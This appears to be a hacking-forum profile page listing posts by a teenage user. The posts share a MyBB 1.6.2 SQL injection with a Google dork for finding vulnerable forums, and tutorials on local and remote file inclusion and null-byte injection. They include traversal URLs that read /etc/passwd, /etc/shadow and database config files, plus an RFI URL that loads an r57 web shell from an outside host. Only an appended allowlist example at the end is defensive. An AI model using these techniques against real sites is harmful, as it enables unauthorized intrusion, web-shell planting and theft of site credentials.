ShadowNET

Active Members
  • Posts: 9
  • Days Won: 1

Everything posted by ShadowNET

  1. Yes, I also discovered it. Worked on most of the forums I found.
  2. ---------------------------------------------------------------------------------------------------
     # Author: Envy
     # Website: www.leethackers.org/board/
     # Shouts: www.HackHound.org
     # This is a MyBB 1.6.2 SQL Injection Exploit. The search.php is affected. The SQLi can be performed and the username + password of admins and users stolen.
     # Google Dork: intext:Powered by MyBB 1.6.2
     ---------------------------------------------------------------------------------------------------
     Proof of Concept:
     Find a forum that is powered by MyBB 1.6.2 using the dork I provided. On most forums, you will need to register to use the search function. After you are there, enter this in the textbox:

         ' or ' or 1337'

     Now hit Enter and you will see an error: You have an error in your SQL Syntax. Now you can perform a SQL Injection Attack. This is nothing for newbies, so please do not ask how to inject it then. MyBB 1.6.1 is vulnerable also!
     # www.leethackers.org
     I am Envy, maybe you saw me in the Hacking scene :)
  3. For some reason I cannot edit my post... well, here is a small update. PHP coders usually use this code:

         <?php
         $color = 'blue';
         // The request parameter is passed to include() with no validation.
         if (isset($_GET['COLOR']))
             $color = $_GET['COLOR'];
         include($color . '.php');
         ?>

     Now, they think they're safe because the file extension must be ".php". WRONG! All you have to do is put '' on the end of the URL, this will ignore including 'php' or any other file extension. This is called null byte injection. e.g.

         www.target.com/index.php?page=../../../etc/shadow%00

     I am willing to post this image, because I noticed on IPBoard forums it is getting replaced. So just add this: after the URL. Just after /etc/shadow[NULL BYTE INJ HERE]
  4. This is a guide I wrote for my board: www.leethackers.org.

     What is RFI?
     RFI, also known as Remote File Inclusion, can be used to execute PHP code from a remote host. This can be really useful. For example:

         www.target.com/index.php?page=index.txt

     Here we see, it takes the text of the text file "index.txt" and places it into index.php. It is the include() PHP function. Sadly, no-one thought about the security while doing this. As I already said, it gets the text of index.txt and places the code into the index.php. What if we change the index.txt to a remote server, for example: www.t00ls.org/r57.txt <--- This is a web shell. So basically, it should look like this now:

         www.target.com/index.php?page=www.t00ls.org/r57.txt

     If the target is vulnerable, you should see a web shell on the page without injecting it or uploading a file! That easy.

     What is LFI?
     LFI, also known as Local File Inclusion, can be used to display sensitive information from a specified file on the webhost. The concept is almost the same as RFI. The only difference is that the files are on localhost. For example, we have this page:

         www.target.com/index.php?page=contact.php

     So it shows the contact.php form. Now let us try this:

         www.target.com/index.php?page=../../../etc/passwd

     If you get a page with users, then this page is vulnerable to LFI. The passwords are displayed as 'x's though. Try to check the 'shadow' file. So do this:

         www.target.com/index.php?page=../../../etc/shadow

     This file is normally not readable for the users. It is only readable for 'root'. What you could try is getting the config.php file that is mostly located in the include folder, so:

         www.target.com/index.php?page=./include/config.php

     If you have got the details for the DB (server, username, password, database) you can connect to it and get the administrator password from the users or w.e table. Hope this small explanation helped you a bit!
  5. http://www.youtube.com/watch?v=xGgxADmYBz8 Mostly affected Windows Versions are XP SP 1,2 and 3.
  6. We will be using NetCat. You will need a shell on a website. http://www.youtube.com/watch?v=woHQFsGY6Ys
  7. My name is ShadowNET, I have been interested in hacking since I was 12. Now I am 14 and have exploited multiple websites. I actually know what I am doing, not like skids thinking that Keylogging and stealing is hacking. I have my own YouTube Channel running with multiple tutorials: M4x1mFTW and a website, leethackers.org.
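
Defensive counterpart to the include() pattern in items 3 and 4 above, added here as an example and not part of ShadowNET's posts: the request parameter is used only as a key into a fixed allowlist, so traversal sequences, remote URLs and null bytes never reach include(). PAGE_DIR, PAGES and resolve_page() are hypothetical names, the sample inputs are constructed, and PHP 8.0 or later is assumed.

```php
<?php
// Added example: allowlist-based page selection replacing include($_GET[...] . '.php').
// PAGE_DIR, PAGES and resolve_page() are hypothetical names, not from the original posts.
declare(strict_types=1);

const PAGE_DIR = __DIR__ . '/pages';

// The only files that may ever be included, keyed by the public page name.
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

function resolve_page(mixed $requested, string $default = 'home'): string
{
    // ?page[]=x arrives as an array; anything that is not a string falls back.
    if (!is_string($requested)) {
        return PAGE_DIR . '/' . PAGES[$default];
    }
    // Exact key match only. The user-supplied string is never concatenated
    // into a path, so "../", "http://..." and "contact\0" cannot select a file.
    $key = array_key_exists($requested, PAGES) ? $requested : $default;
    return PAGE_DIR . '/' . PAGES[$key];
}

// Constructed sample inputs, as they could arrive in $_GET['page'].
$samples = [
    'contact',
    '../../../etc/passwd',
    "contact\0",
    'http://example.invalid/x.txt',
    ['unexpected' => 'array'],
];

foreach ($samples as $sample) {
    printf(
        "%-40s => %s\n",
        json_encode($sample, JSON_UNESCAPED_SLASHES),
        basename(resolve_page($sample))
    );
}

// In the page itself the call site becomes:
//   include resolve_page($_GET['page'] ?? 'home');
```

As defence in depth, keep `allow_url_include` at its default of Off in php.ini; PHP has also rejected paths containing a null byte since 5.3.4.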